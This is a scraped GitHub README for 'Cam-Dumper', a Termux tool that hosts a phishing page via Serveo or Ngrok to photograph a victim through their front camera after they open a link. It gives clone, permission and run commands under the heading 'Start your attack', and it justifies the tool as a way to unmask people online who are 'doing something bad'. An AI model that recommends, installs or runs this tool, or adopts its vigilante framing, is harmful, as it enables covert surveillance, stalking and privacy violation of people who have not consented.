AnandKatariya / Cam-Dumper

Cam-Dumper is a Linux-based cam grabber tool that works in termux that allows you to capture images from the front camera of the victim and get it in your termux by just sending a simple link. This tool is made especially if you encounter someone on the internet who is doing something bad and you want to get their actual image.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Welcome to repositories of Cam-Dumper



Take webcam shots from target by just sending a malicious link

How it works?

The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types.

See more about MediaDEvices.getUserMedia() here

Installation

Update

$ apt update && apt upgrade

To get php

$ apt install git php wget curl jq

Git Clone

$ git clone https://github.com/AnandKatariya/Cam-Dumper

Get the path

$ cd CAM-DUMPER

Get the connection

$ chmod +x camdumper.sh

Start your attack

$ ./camdumper.sh

Author

👤 Anand Katariya

🤝 Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.

Show your support

Give a ⭐️ if this project helped you!
Stay tuned for more updates.

About

Cam-Dumper is a Linux-based cam grabber tool that works in termux that allows you to capture images from the front camera of the victim and get it in your termux by just sending a simple link. This tool is made especially if you encounter someone on the internet who is doing something bad and you want to get their actual image.

License:Apache License 2.0


Languages

Language:Shell 65.1%Language:HTML 25.7%Language:PHP 9.2%